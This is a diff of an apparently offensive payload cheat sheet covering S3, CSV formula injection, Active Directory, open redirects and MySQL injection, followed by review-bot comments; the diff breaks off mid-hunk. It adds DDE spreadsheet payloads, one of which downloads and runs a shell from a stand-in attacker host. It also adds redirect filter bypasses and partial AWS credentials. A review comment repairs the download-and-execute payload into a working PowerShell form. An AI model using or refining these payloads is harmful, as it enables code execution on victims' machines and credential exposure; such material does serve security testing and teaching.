diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 0ac413b..34625a0 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -26,7 +26,15 @@ AWSSecretKey=[ENTER HERE YOUR KEY] aws configure --profile nameofprofile ``` -then you can use *--profile nameofprofile* in the aws command +then you can use *--profile nameofprofile* in the aws command. + +Alternatively you can use environment variables instead of creating a profile. + +```bash +export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56 +export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ +export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU= +``` ## Open Bucket @@ -163,4 +171,5 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) -* [FlAWS.cloud Challenge based on AWS vulnerabilities](http://flaws.cloud/) +* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) +* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) diff --git a/CSV injection/README.md b/CSV injection/README.md index 5430482..126105d 100644 --- a/CSV injection/README.md +++ b/CSV injection/README.md @@ -1,4 +1,4 @@ -# CSV Excel formula injection +# CSV Injection (Formula Injection) Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. 
@@ -9,12 +9,15 @@ Basic exploit with Dynamic Data Exchange ```powershell DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 +=cmd|' /C notepad'!'A1' +=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 ``` Technical Details of the above payload: -cmd is the name the server can respond to whenever a client is trying to access the server -/C calc is the file name which in our case is the calc(i.e the calc.exe) -!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data + +- `cmd` is the name the server can respond to whenever a client is trying to access the server +- `/C` calc is the file name which in our case is the calc(i.e the calc.exe) +- `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data Any formula can be started with @@ -29,4 +32,6 @@ Any formula can be started with * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) -* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) \ No newline at end of file +* [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) +* [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) +* [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 57ed61b..f0a3c40 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md 
@@ -16,7 +16,7 @@ * [Pass-the-Hash](#pass-the-hash) * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) - * [NTLMv2 hashes relaying](#ntlv2-hashes-relaying) + * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Privilege Escalation](#privilege-escalation) diff --git a/Open redirect/README.md b/Open redirect/README.md index 9ce644f..3630004 100644 --- a/Open redirect/README.md +++ b/Open redirect/README.md @@ -48,6 +48,7 @@ Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) Using "%E3%80%82" to bypass "." blacklisted character ```powershell +/?redir=google怂com //google%E3%80%82com ``` diff --git a/SQL injection/Images/wildcard_underscore.jpg b/SQL injection/Images/wildcard_underscore.jpg new file mode 100644 index 0000000..81007e4 Binary files /dev/null and b/SQL injection/Images/wildcard_underscore.jpg differ diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 1d7207d..4974839 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -91,6 +91,14 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1) AND MAKE_SET(YOLO
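Review bot: the new `export` block in the first `AWS Amazon Bucket S3/README.md` hunk ships what look like fragments of real credentials (`ASIAZ[...]PODP56`, `fPk/Gya[...]4/j5bSuhDQ`, `FQoGZXIvYXdzE[...]8aOK4QU=`) instead of the `[ENTER HERE YOUR KEY]` placeholder convention used a few lines above for the profile; even truncated, real key material in a public cheat sheet is bad practice and trips secret scanners. Use AWS's documented dummy values, e.g. `export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE` and `export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY`, and add one line of prose saying that `AWS_SESSION_TOKEN` only exists for temporary credentials (the `ASIA`-prefixed keys issued by STS) and must be left unset when using long-term `AKIA` keys.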
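Review bot: in the reference-list hunk of the same README, the added `http://flaws2.cloud` entry drops the trailing slash that the sibling `http://flaws.cloud/` entry keeps; write it as `http://flaws2.cloud/` (or upgrade both to `https://` if the sites serve it) so the two challenge links are consistent.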
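Review bot: renaming the H1 in `CSV injection/README.md` from `CSV Excel formula injection` to `CSV Injection (Formula Injection)` changes the auto-generated anchor from `#csv-excel-formula-injection` to `#csv-injection-formula-injection`, so any index or cross-link in the repository that points at the old anchor needs the same update in this PR. While touching the top of the file, the unchanged context line still reads `Excel,Libre Office or Open Office` (missing space after the comma).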
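Review bot: the second added payload in the DDE hunk, `=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0`, does not do what it implies: `IEX` (Invoke-Expression) evaluates a string as PowerShell code and `wget` is an alias of Invoke-WebRequest that returns a response object, so feeding it a `.exe` never runs the binary. Either fetch a script and evaluate its body, e.g. `IEX((New-Object Net.WebClient).DownloadString('http://attacker_server/shell.ps1'))`, or download the executable to disk and start it in a second step. In the explanatory bullets, the backticks cover only the switch (`` `/C` calc ``); they should cover `` `/C calc` ``, and that string is the DDE topic, which `cmd.exe` receives as its command line, rather than a "file name": the form is `=application|topic!item`, which is worth stating once so the three bullets line up with it. Finally, the fence is tagged `powershell` but contains spreadsheet formulas; `text` or no tag would be more accurate.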
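Review bot: the CSV references hunk still ends with `\ No newline at end of file`; add the trailing newline while editing the last line. The two new entries also mix styles: the Payatu title is copied in shouting case with four exclamation marks (`CSV INJECTION: BASIC TO EXPLOIT!!!!`) and dated `30/11/2017`, while the next entry is dated `5th November 2015`; normalise the title casing and pick one date format for the list.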
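Review bot: the new line `/?redir=google怂com` in `Open redirect/README.md` does not contain the character the surrounding text is about. As rendered in this diff it uses `怂` (U+6002), while `%E3%80%82` on the next line is the UTF-8 encoding of U+3002 `。` (IDEOGRAPHIC FULL STOP), which is the code point browsers map to `.` during hostname (IDNA) processing and therefore the whole bypass; U+6002 gets no such mapping, so the raw-character payload as written will not resolve. Replace it with `。` at the source (if this is a copy or encoding slip, that is exactly the character that makes or breaks the payload) and consider keeping only the percent-encoded form, which survives copy-paste and font substitution. The fence here is also tagged `powershell` for what is a URL fragment.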